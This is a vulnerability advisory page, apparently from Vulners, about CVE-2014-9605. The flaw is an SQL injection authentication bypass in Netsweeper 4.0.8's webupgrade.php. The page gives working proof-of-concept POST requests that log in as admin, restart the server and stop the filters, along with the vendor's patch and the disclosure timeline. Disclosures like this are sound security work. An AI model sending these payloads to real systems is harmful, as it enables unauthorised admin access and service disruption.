Vulners
Lucene search
Netsweeper 4.0.8 - SQL Injection / Authentication Bypass
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Netsweeper 4.0.9 - Multiple Vulnerabilities | 13 Aug 201500:00 | – | zdt |
 | Netsweeper WebUpgrade Authorization Issues Vulnerability | 9 Sep 201500:00 | – | cnvd |
 | CVE-2014-9605 | 4 Sep 201515:00 | – | cve |
 | CVE-2014-9605 | 4 Sep 201515:00 | – | cvelist |
 | EUVD-2014-9418 | 7 Oct 202500:30 | – | euvd |
 | Netsweeper 4.0.8 - SQL Injection Authentication Bypass | 21 Aug 201500:00 | – | exploitpack |
 | CVE-2014-9605 | 4 Sep 201515:59 | – | nvd |
 | Netsweeper Multiple Vulnerabilities (Aug 2015) | 25 Aug 201500:00 | – | openvas |
 | Sql injection | 4 Sep 201515:59 | – | prion |
+----------------------------------------------------------------+
+ Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) +
+----------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com/
Version : 4.0.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9605
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to:
i) "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders)
ii) "Restart" the server
iii) "Stop the filters on the server"
Vulnerability Type: Authentication Bypass (using two single-quotes)
p0c: http://netsweeper/webupgrade/webupgrade.php
POST: step=&login='&password='&show_advanced_output=
p0c restart the server:
http://netsweeper/webupgrade/webupgrade.php
POST: step=12&login='&password='&show_advanced_output=
followed by
http://netsweeper/webupgrade/webupgrade.php HTTP/1.1
POST: step=12&restart=yes&show_advanced_output=false
p0c stop the filters on the server:
http://netsweeper/webupgrade/webupgrade.php
POST: step=9&stopservices=yes&show_advanced_output=
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9605
11-Aug-2015: Public disclosureData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Aug 2015 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 29.4
EPSS0.08686